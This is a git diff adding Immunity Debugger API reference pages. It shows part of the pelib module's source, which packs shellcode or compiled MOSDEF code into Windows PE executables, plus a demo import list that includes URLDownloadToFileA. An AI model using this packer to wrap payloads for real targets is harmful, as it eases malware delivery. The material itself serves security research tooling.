962 for a in IIBN :
+
963 for b in a :
+
964 buf += struct . pack ( "L" , b [ 1 ] )
+
965 buf += struct . pack ( "L" , 0x0 )
+
966
+
967
+
968 for a in IIBN :
+
969 for b in a :
+
970 buf += struct . pack ( "L" , b [ 1 ] )
+
971 buf += struct . pack ( "L" , 0x0 )
+
972
+
973
+
974 for a in IIBN :
+
975 for b in a :
+
976 buf += b [ 0 ] . raw ( )
+
977 buf += endpad
+
978
+
979 return buf
+
980
+
981
+
982
+
984 from win32peresolver import win32peresolver
+
985
+
986
+
987
+
988
+
989
+
990
+
991
+
992
+
993
+
994
+
995
+
996
+
997
+
998
+
999
+
1000
+
1001
+
1002
+
1003
+
1004
+
1005
+
1006
+
1007
+
1008
+
1009
+
1010
+
1011
+
1012
+
1013
+
1014
+
1015
+
1016
+
1017
+
1018
+
1019
+
1020
+
1021 image_base = 0x40000
+
1022 plt_len = len ( mosdef . assemble ( "jmp *(0x01020304)" , "X86" ) )
+
1023 plt_entry = 0x1A0 + image_base
+
1024
+
1025 w = win32peresolver ( plt_entry )
+
1026 w . setPLTEntrySize ( plt_len )
+
1027
+
1028 shellcode = w . compile ( code , vars )
+
1029
+
1030
+
1031
+
1032 dll = { }
+
1033 func_by_addr = { }
+
1034 functions_num = 0
+
1035
+
1036
+
1037 for a in w . remotefunctioncache . keys ( ) :
+
1038 s = a . split ( "|" )
+
1039 if dll . has_key ( s [ 0 ] ) :
+
1040 dll [ s [ 0 ] ] . append ( s [ 1 ] )
+
1041 else :
+
1042 dll [ s [ 0 ] ] = [ s [ 1 ] ]
+
1043 functions_num += 1
+
1044 func_by_addr [ a ] = w . remotefunctioncache [ a ]
+
1045
+
1046 importante = [ ]
+
1047 for a in dll . keys ( ) :
+
1048 importante . append ( ( a , dll [ a ] ) )
+
1049 shellcode = "\x90" * ( plt_len * functions_num ) + shellcode
+
1050
+
1051
+
1052
+
1053
+
1054
+
1055
+
1056 idx = 0
+
1057
+
1058 mz = MZ ( )
+
1059 mz . e_lfanew = mz . getSize ( )
+
1060
+
1061 idx += mz . getSize ( )
+
1062
+
1063
+
1064 imgHdr = IMGhdr ( )
+
1065 imgHdr . Machine = 0x014c
+
1066 imgHdr . NumberOfSections = 0x2
+
1067 imgHdr . Characteristics = 0x0102
+
1068
+
1069 idx += imgHdr . getSize ( ) + 4
+
1070
+
1071
+
1072 imgOpt = IMGOPThdr ( )
+
1073 imgOpt . SectionAlignment = 0x20
+
1074 imgOpt . FileAlignment = 0x20
+
1075 imgOpt . MajorOperatingSystemVersion = 0x4
+
1076 imgOpt . MajorSubsystemVersion = 0x4
+
1077 imgOpt . Subsystem = 0x3
+
1078 imgOpt . SizeOfStackReserve = 0x100000
+
1079 imgOpt . SizeOfStackCommit = 0x1000
+
1080 imgOpt . SizeOfHeapReserve = 0x100000
+
1081 imgOpt . SizeOfHeapCommit = 0x1000
+
1082 imgOpt . NumberOfRvaAndSizes = 0x10
+
1083
+
1084 idx += imgOpt . getSize ( )
+
1085
+
1086
+
1087 directories = [ ]
+
1088 for a in range ( 0 , imgOpt . NumberOfRvaAndSizes ) :
+
1089 directories . append ( Directory ( ) )
+
1090
+
1091 idx += directories [ 0 ] . getSize ( ) * 16
+
1092
+
1093
+
1094 code = Section ( )
+
1095 code . Name = ".text"
+
1096 code . Characteristics = 0x60000020L
+
1097 idx += code . getSize ( )
+
1098
+
1099
+
1100 data = Section ( )
+
1101 data . Name = ".data"
+
1102 data . Characteristics = 0xc0000040L
+
1103
+
1104 idx += data . getSize ( )
+
1105
+
1106 code_offset = self . align ( idx , imgOpt . FileAlignment )
+
1107 firstpad = "\0" * ( code_offset - idx )
+
1108 idx = code_offset
+
1109
+
1110
+
1111 idx += len ( shellcode )
+
1112 data_offset = self . align ( idx , imgOpt . FileAlignment )
+
1113 secondpad = "\0" * ( data_offset - idx )
+
1114 idx = data_offset
+
1115 data_buf = ""
+
1116 idx += len ( data_buf )
+
1117
+
1118
+
1119 import_offset = idx
+
1120 imports = [ ]
+
1121 ndx = 0
+
1122 import_str = ""
+
1123
+
1124 for a in importante :
+
1125 i = ImportDescriptor ( )
+
1126 i . ForwarderChain = 0xFFFFFFFFL
+
1127 imports . append ( ( i , ndx ) )
+
1128
+
1129 ndx += len ( a [ 0 ] + "\0" )
+
1130
+
1131
+
1132 import_str += a [ 0 ] + "\0"
+
1133
+
1134
+
1135 imports . append ( ( ImportDescriptor ( ) , 0 ) )
+
1136 idx += i . getSize ( ) * len ( imports )
+
1137
+
1138 import_str_offset = idx
+
1139 idx += len ( import_str )
+
1140
+
1141 off = self . align ( idx , imgOpt . FileAlignment )
+
1142 import_str += "\0" * ( off - idx )
+
1143 idx = off
+
1144
+
1145
+
1146 original_thunks_offset = idx
+
1147 original_thunk = [ ]
+
1148
+
1149 for a in importante :
+
1150 original_thunk . append ( idx )
+
1151
+
1152 idx += len ( a [ 1 ] ) * 4 + 4
+
1153
+
1154
+
1155 first_thunks_offset = idx
+
1156 first_thunk = [ ]
+
1157 plt_ndx = 0x1A0
+
1158 for a in importante :
+
1159 first_thunk . append ( idx )
+
1160 for b in a [ 1 ] :
+
1161 dupla = "%s|%s" % ( a [ 0 ] , b )
+
1162
+
1163 if not func_by_addr . has_key ( dupla ) :
+
1164 raise PEError , "Error on Thunk"
+
1165 func_by_addr [ func_by_addr [ dupla ] ] = "jmp *(0x%08x)\n" % ( idx + image_base )
+
1166 idx += 4
+
1167 idx += 4
+
1168
+
1169 PLT = ""
+
1170 for a in range ( plt_entry , plt_entry + plt_len * functions_num , plt_len ) :
+
1171 if not func_by_addr . has_key ( a ) :
+
1172 raise PEError , "func_by_addr doesn't have a PLT address (%x)" % a
+
1173 PLT += mosdef . assemble ( func_by_addr [ a ] , "X86" )
+
1174 shellcode = PLT + shellcode [ plt_len * functions_num : ]
+
1175 print "Shellcode size (with PLT): %d" % len ( shellcode )
+
1176
+
1177
+
1178
+
1179 IIBN = [ ]
+
1180 for a in importante :
+
1181 tbl = [ ]
+
1182 IIBN . append ( tbl )
+
1183 for b in a [ 1 ] :
+
1184 iibn = ImageImportByName ( )
+
1185 iibn . Name = b
+
1186 iibn . Hint = 1
+
1187 tbl . append ( ( iibn , idx ) )
+
1188 idx += iibn . getSize ( )
+
1189
+
1190 endpad = "\0" * ( self . align ( idx , imgOpt . FileAlignment ) - idx )
+
1191
+
1192
+
1193 imgOpt . SizeOfCode = len ( shellcode ) + len ( secondpad )
+
1194 imgOpt . BaseOfCode = code_offset
+
1195
+
1196 imgOpt . AddressOfEntryPoint = code_offset + plt_len * functions_num
+
1197
+
1198 imgOpt . BaseOfData = data_offset
+
1199 imgOpt . ImageBase = image_base
+
1200 imgOpt . SizeOfInitializedData = 0x20
+
1201 imgOpt . SizeOfImage = 0xC
+
1202
+
1203 imgOpt . SizeOfHeaders = code_offset
+
1204 imgOpt . NumberOfRvaAndSizes = 0x10
+
1205
+
1206
+
1207
+
1208 directories [ 1 ] . VirtualSize = directories [ 1 ] . Size = idx - import_offset
+
1209 directories [ 1 ] . VirtualAddress = import_offset
+
1210
+
1211
+
1212 code . VirtualAddress = code_offset
+
1213 code . VirtualSize = code . SizeOfRawData = imgOpt . SizeOfCode
+
1214 code . PointerToRawData = code_offset
+
1215
+
1216 data . VirtualAddress = data_offset
+
1217 data . VirtualSize = data . SizeOfRawData = idx - data_offset
+
1218 data . PointerToRawData = data_offset
+
1219
+
1220 imgOpt . SizeOfImage = idx
+
1221
+
1222
+
1223 for a in range ( 0 , len ( imports ) - 1 ) :
+
1224 imports [ a ] [ 0 ] . OriginalFirstThunk = original_thunk [ a ]
+
1225 imports [ a ] [ 0 ] . FirstThunk = first_thunk [ a ]
+
1226 imports [ a ] [ 0 ] . Name = import_str_offset + imports [ a ] [ 1 ]
+
1227
+
1228
+
1229
+
1230 buf = mz . raw ( ) + struct . pack ( "L" , PE_MAGIC ) + imgHdr . raw ( ) + imgOpt . raw ( )
+
1231 for a in directories :
+
1232 buf += a . raw ( )
+
1233 buf += code . raw ( )
+
1234 buf += data . raw ( )
+
1235 buf += firstpad
+
1236 buf += shellcode
+
1237 buf += secondpad
+
1238 buf += data_buf
+
1239
+
1240 for a in imports :
+
1241 buf += a [ 0 ] . raw ( )
+
1242 buf += import_str
+
1243
+
1244
+
1245 for a in IIBN :
+
1246 for b in a :
+
1247 buf += struct . pack ( "L" , b [ 1 ] )
+
1248 buf += struct . pack ( "L" , 0x0 )
+
1249
+
1250
+
1251 for a in IIBN :
+
1252 for b in a :
+
1253 buf += struct . pack ( "L" , b [ 1 ] )
+
1254 buf += struct . pack ( "L" , 0x0 )
+
1255
+
1256
+
1257 for a in IIBN :
+
1258 for b in a :
+
1259 buf += b [ 0 ] . raw ( )
+
1260 buf += endpad
+
1261
+
1262
+
1263 f = open ( filename , "wb" )
+
1264 f . write ( buf )
+
1265 f . close ( )
+
1266 return len ( buf )
+
1267
+
1269 print "usage: %s -f <file> [-O -W]" % name
+
1270 print "\t -O inspect the file given by -f"
+
1271 print "\t -W create a .exe using createShellcode"
+
1272 print "\t -E create a .exe using MOSDEF code"
+
1273 sys . exit ( 0 )
+
1274
+1275 if __name__ == "__main__" : 1276 import getopt , sys
+1277 args = sys . argv [ 1 : ]
+1278 OPEN = 0x1
+1279 WRITE = 0x2
+1280 EXAMPLE = 0x3
+1281 p = PElib ( )
+1282
+1283 what = 0
+1284 file = ""
+1285 try :
+1286 opts , args = getopt . getopt ( args , "f:OWE" )
+1287 except :
+1288 print "Error in Arguments"
+1289 usage ( sys . argv [ 0 ] )
+1290 for o , a in opts :
+1291 if o == '-f' :
+1292 file = a
+1293 if o == '-O' :
+1294 what = OPEN
+1295 if o == '-W' :
+1296 what = WRITE
+1297 if o == '-E' :
+1298 what = EXAMPLE
+1299 if file :
+1300 if what == OPEN :
+1301 p . openfile ( file )
+1302 elif what == WRITE :
+1303 shellcode = p . createShellcode ( )
+1304 imports = [ ( "advapi32.dll" , [ "RevertToSelf" , "AccessCheck" ] ) , ( "urlmon.dll" , [ "URLDownloadToFileA" , "FindMediaType" ] ) ]
+1305
+1306 p . createPE ( file , shellcode , imports )
+1307
+1308 elif what == EXAMPLE :
+1309 vars = { }
+1310 vars [ "filename" ] = "boo"
+1311
+1312 code = """
+1313 //start of code 1314 #import "remote", "kernel32.dll|GetProcAddress" as "getprocaddress" 1315 #import "remote", "kernel32.dll|RemoveDirectoryA" as "RemoveDirectory" 1316 #import "remote", "kernel32.dll|ExitProcess" as "exit" 1317 #import "string", "filename" as "filename" 1318 1319 void main() 1320 { 1321 int i; 1322 i = RemoveDirectory(filename); 1323 i = exit(0); 1324 } 1325 """ 1326
+1327
+1328 p . createMOSDEFPE ( file , code , vars )
+1329
+1330 else :
+1331 usage ( sys . argv [ 0 ] )
+1332 else :
+1333
+1334 usage ( sys . argv [ 0 ] )
+1335
+1336
+1337
+1338
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.Directory-class.html b/1.73/Documentation/Ref/Libs.pelib.Directory-class.html
new file mode 100755
index 0000000..e4132c7
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.Directory-class.html
@@ -0,0 +1,192 @@
+
+
+
+
+ Libs.pelib.Directory
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class Directory
+
+
+
+
+
+
+
+
+Class Directory source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.IMGOPThdr-class.html b/1.73/Documentation/Ref/Libs.pelib.IMGOPThdr-class.html
new file mode 100755
index 0000000..b12ae63
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.IMGOPThdr-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.pelib.IMGOPThdr
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class IMGOPThdr
+
+
+
+
+
+
+
+
+Class IMGOPThdr source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.IMGhdr-class.html b/1.73/Documentation/Ref/Libs.pelib.IMGhdr-class.html
new file mode 100755
index 0000000..3c4eb7f
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.IMGhdr-class.html
@@ -0,0 +1,192 @@
+
+
+
+
+ Libs.pelib.IMGhdr
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class IMGhdr
+
+
+
+
+
+
+
+
+Class IMGhdr source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.ImageExportDirectory-class.html b/1.73/Documentation/Ref/Libs.pelib.ImageExportDirectory-class.html
new file mode 100755
index 0000000..bd5e0c4
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.ImageExportDirectory-class.html
@@ -0,0 +1,209 @@
+
+
+
+
+ Libs.pelib.ImageExportDirectory
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class ImageExportDirectory
+
+
+
+
+
+
+
+
+Class ImageExportDirectory source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.ImageImportByName-class.html b/1.73/Documentation/Ref/Libs.pelib.ImageImportByName-class.html
new file mode 100755
index 0000000..d4f6fc9
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.ImageImportByName-class.html
@@ -0,0 +1,192 @@
+
+
+
+
+ Libs.pelib.ImageImportByName
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class ImageImportByName
+
+
+
+
+
+
+
+
+Class ImageImportByName source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.ImportDescriptor-class.html b/1.73/Documentation/Ref/Libs.pelib.ImportDescriptor-class.html
new file mode 100755
index 0000000..2c09c46
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.ImportDescriptor-class.html
@@ -0,0 +1,227 @@
+
+
+
+
+ Libs.pelib.ImportDescriptor
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class ImportDescriptor
+
+
+
+
+
+
+
+
+Class ImportDescriptor source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setImport (self ,
+ name ,
+ obj )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.MZ-class.html b/1.73/Documentation/Ref/Libs.pelib.MZ-class.html
new file mode 100755
index 0000000..2939006
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.MZ-class.html
@@ -0,0 +1,208 @@
+
+
+
+
+ Libs.pelib.MZ
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class MZ
+
+
+
+
+
+
+
+
+Class MZ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.PE-class.html b/1.73/Documentation/Ref/Libs.pelib.PE-class.html
new file mode 100755
index 0000000..a4a3fcd
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.PE-class.html
@@ -0,0 +1,333 @@
+
+
+
+
+ Libs.pelib.PE
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class PE
+
+
+
+
+
+
+
+
+Class PE source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ get (self ,
+ data ,
+ offset2PE )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ getImportDescriptor (self ,
+ data ,
+ rva )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ printImportDescriptor (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ getString (self ,
+ data ,
+ rva )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getOffsetFromRVA (self ,
+ rva ,
+ imagebase =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getRVAfromoffset (self ,
+ offset ,
+ imagebase =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getDirectories (self ,
+ data )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ getExportDescriptor (self ,
+ data ,
+ rva )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.PEError-class.html b/1.73/Documentation/Ref/Libs.pelib.PEError-class.html
new file mode 100755
index 0000000..1993df1
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.PEError-class.html
@@ -0,0 +1,190 @@
+
+
+
+
+ Libs.pelib.PEError
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class PEError
+
+
+
+
+
+
+
+
+Class PEError source code
+
+ object --+
+ |
+exceptions.BaseException --+
+ |
+ exceptions.Exception --+
+ |
+ PEError
+
+
+
+
+
+
+ Inherited from exceptions.Exception :
+ __init__,
+ __new__
+
+ Inherited from exceptions.BaseException :
+ __delattr__,
+ __getattribute__,
+ __getitem__,
+ __getslice__,
+ __reduce__,
+ __repr__,
+ __setattr__,
+ __setstate__,
+ __str__
+
+ Inherited from object :
+ __hash__,
+ __reduce_ex__
+
+
+
+
+
+
+
+
+
+ Inherited from exceptions.BaseException :
+ args,
+ message
+
+ Inherited from object :
+ __class__
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.PElib-class.html b/1.73/Documentation/Ref/Libs.pelib.PElib-class.html
new file mode 100755
index 0000000..c9e1b08
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.PElib-class.html
@@ -0,0 +1,283 @@
+
+
+
+
+ Libs.pelib.PElib
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class PElib
+
+
+
+
+
+
+
+
+Class PElib source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ align (self ,
+ idx ,
+ aligment )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ createPE (self ,
+ filename ,
+ shellcode ,
+ importante =[('advapi32.dll', ['RevertToSelf'])]
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ createPEFileBuf (self ,
+ shellcode ,
+ importante =[('advapi32.dll', ['RevertToSelf'])]
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ createMOSDEFPE (self ,
+ filename ,
+ code ,
+ vars ={}
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.pelib.Section-class.html b/1.73/Documentation/Ref/Libs.pelib.Section-class.html
new file mode 100755
index 0000000..6420e9e
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.pelib.Section-class.html
@@ -0,0 +1,227 @@
+
+
+
+
+ Libs.pelib.Section
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module pelib ::
+ Class Section
+
+
+
+
+
+
+
+
+Class Section source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ has (self ,
+ rva ,
+ imagebase =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/class-tree.html b/1.73/Documentation/Ref/class-tree.html
new file mode 100755
index 0000000..923036e
--- /dev/null
+++ b/1.73/Documentation/Ref/class-tree.html
@@ -0,0 +1,332 @@
+
+
+
+
+ Class Hierarchy
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+ [ Module Hierarchy
+ | Class Hierarchy ]
+ Class Hierarchy
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/crarr.png b/1.73/Documentation/Ref/crarr.png
new file mode 100755
index 0000000..26b43c5
Binary files /dev/null and b/1.73/Documentation/Ref/crarr.png differ
diff --git a/1.73/Documentation/Ref/epydoc.css b/1.73/Documentation/Ref/epydoc.css
new file mode 100755
index 0000000..a21beda
--- /dev/null
+++ b/1.73/Documentation/Ref/epydoc.css
@@ -0,0 +1,322 @@
+
+
+/* Epydoc CSS Stylesheet
+ *
+ * This stylesheet can be used to customize the appearance of epydoc's
+ * HTML output.
+ *
+ */
+
+/* Default Colors & Styles
+ * - Set the default foreground & background color with 'body'; and
+ * link colors with 'a:link' and 'a:visited'.
+ * - Use bold for decision list terms.
+ * - The heading styles defined here are used for headings *within*
+ * docstring descriptions. All headings used by epydoc itself use
+ * either class='epydoc' or class='toc' (CSS styles for both
+ * defined below).
+ */
+body { background: #ffffff; color: #000000; }
+p { margin-top: 0.5em; margin-bottom: 0.5em; }
+a:link { color: #0000ff; }
+a:visited { color: #204080; }
+dt { font-weight: bold; }
+h1 { font-size: +140%; font-style: italic;
+ font-weight: bold; }
+h2 { font-size: +125%; font-style: italic;
+ font-weight: bold; }
+h3 { font-size: +110%; font-style: italic;
+ font-weight: normal; }
+code { font-size: 100%; }
+/* N.B.: class, not pseudoclass */
+a.link { font-family: monospace; }
+
+/* Page Header & Footer
+ * - The standard page header consists of a navigation bar (with
+ * pointers to standard pages such as 'home' and 'trees'); a
+ * breadcrumbs list, which can be used to navigate to containing
+ * classes or modules; options links, to show/hide private
+ * variables and to show/hide frames; and a page title (using
+ * ). The page title may be followed by a link to the
+ * corresponding source code (using 'span.codelink').
+ * - The footer consists of a navigation bar, a timestamp, and a
+ * pointer to epydoc's homepage.
+ */
+h1.epydoc { margin: 0; font-size: +140%; font-weight: bold; }
+h2.epydoc { font-size: +130%; font-weight: bold; }
+h3.epydoc { font-size: +115%; font-weight: bold;
+ margin-top: 0.2em; }
+td h3.epydoc { font-size: +115%; font-weight: bold;
+ margin-bottom: 0; }
+table.navbar { background: #a0c0ff; color: #000000;
+ border: 2px groove #c0d0d0; }
+table.navbar table { color: #000000; }
+th.navbar-select { background: #70b0ff;
+ color: #000000; }
+table.navbar a { text-decoration: none; }
+table.navbar a:link { color: #0000ff; }
+table.navbar a:visited { color: #204080; }
+span.breadcrumbs { font-size: 85%; font-weight: bold; }
+span.options { font-size: 70%; }
+span.codelink { font-size: 85%; }
+td.footer { font-size: 85%; }
+
+/* Table Headers
+ * - Each summary table and details section begins with a 'header'
+ * row. This row contains a section title (marked by
+ * 'span.table-header') as well as a show/hide private link
+ * (marked by 'span.options', defined above).
+ * - Summary tables that contain user-defined groups mark those
+ * groups using 'group header' rows.
+ */
+td.table-header { background: #70b0ff; color: #000000;
+ border: 1px solid #608090; }
+td.table-header table { color: #000000; }
+td.table-header table a:link { color: #0000ff; }
+td.table-header table a:visited { color: #204080; }
+span.table-header { font-size: 120%; font-weight: bold; }
+th.group-header { background: #c0e0f8; color: #000000;
+ text-align: left; font-style: italic;
+ font-size: 115%;
+ border: 1px solid #608090; }
+
+/* Summary Tables (functions, variables, etc)
+ * - Each object is described by a single row of the table with
+ * two cells. The left cell gives the object's type, and is
+ * marked with 'code.summary-type'. The right cell gives the
+ * object's name and a summary description.
+ * - CSS styles for the table's header and group headers are
+ * defined above, under 'Table Headers'
+ */
+table.summary { border-collapse: collapse;
+ background: #e8f0f8; color: #000000;
+ border: 1px solid #608090;
+ margin-bottom: 0.5em; }
+td.summary { border: 1px solid #608090; }
+code.summary-type { font-size: 85%; }
+table.summary a:link { color: #0000ff; }
+table.summary a:visited { color: #204080; }
+
+
+/* Details Tables (functions, variables, etc)
+ * - Each object is described in its own div.
+ * - A single-row summary table w/ table-header is used as
+ * a header for each details section (CSS style for table-header
+ * is defined above, under 'Table Headers').
+ */
+table.details { border-collapse: collapse;
+ background: #e8f0f8; color: #000000;
+ border: 1px solid #608090;
+ margin: .2em 0 0 0; }
+table.details table { color: #000000; }
+table.details a:link { color: #0000ff; }
+table.details a:visited { color: #204080; }
+
+/* Fields */
+dl.fields { margin-left: 2em; margin-top: 1em;
+ margin-bottom: 1em; }
+dl.fields dd ul { margin-left: 0em; padding-left: 0em; }
+dl.fields dd ul li ul { margin-left: 2em; padding-left: 0em; }
+div.fields { margin-left: 2em; }
+div.fields p { margin-bottom: 0.5em; }
+
+/* Index tables (identifier index, term index, etc)
+ * - link-index is used for indices containing lists of links
+ * (namely, the identifier index & term index).
+ * - index-where is used in link indices for the text indicating
+ * the container/source for each link.
+ * - metadata-index is used for indices containing metadata
+ * extracted from fields (namely, the bug index & todo index).
+ */
+table.link-index { border-collapse: collapse;
+ background: #e8f0f8; color: #000000;
+ border: 1px solid #608090; }
+td.link-index { border-width: 0px; }
+table.link-index a:link { color: #0000ff; }
+table.link-index a:visited { color: #204080; }
+span.index-where { font-size: 70%; }
+table.metadata-index { border-collapse: collapse;
+ background: #e8f0f8; color: #000000;
+ border: 1px solid #608090;
+ margin: .2em 0 0 0; }
+td.metadata-index { border-width: 1px; border-style: solid; }
+table.metadata-index a:link { color: #0000ff; }
+table.metadata-index a:visited { color: #204080; }
+
+/* Function signatures
+ * - sig* is used for the signature in the details section.
+ * - .summary-sig* is used for the signature in the summary
+ * table, and when listing property accessor functions.
+ * */
+.sig-name { color: #006080; }
+.sig-arg { color: #008060; }
+.sig-default { color: #602000; }
+.summary-sig { font-family: monospace; }
+.summary-sig-name { color: #006080; font-weight: bold; }
+table.summary a.summary-sig-name:link
+ { color: #006080; font-weight: bold; }
+table.summary a.summary-sig-name:visited
+ { color: #006080; font-weight: bold; }
+.summary-sig-arg { color: #006040; }
+.summary-sig-default { color: #501800; }
+
+/* Subclass list
+ */
+ul.subclass-list { display: inline; }
+ul.subclass-list li { display: inline; }
+
+/* To render variables, classes etc. like functions */
+table.summary .summary-name { color: #006080; font-weight: bold;
+ font-family: monospace; }
+table.summary
+ a.summary-name:link { color: #006080; font-weight: bold;
+ font-family: monospace; }
+table.summary
+ a.summary-name:visited { color: #006080; font-weight: bold;
+ font-family: monospace; }
+
+/* Variable values
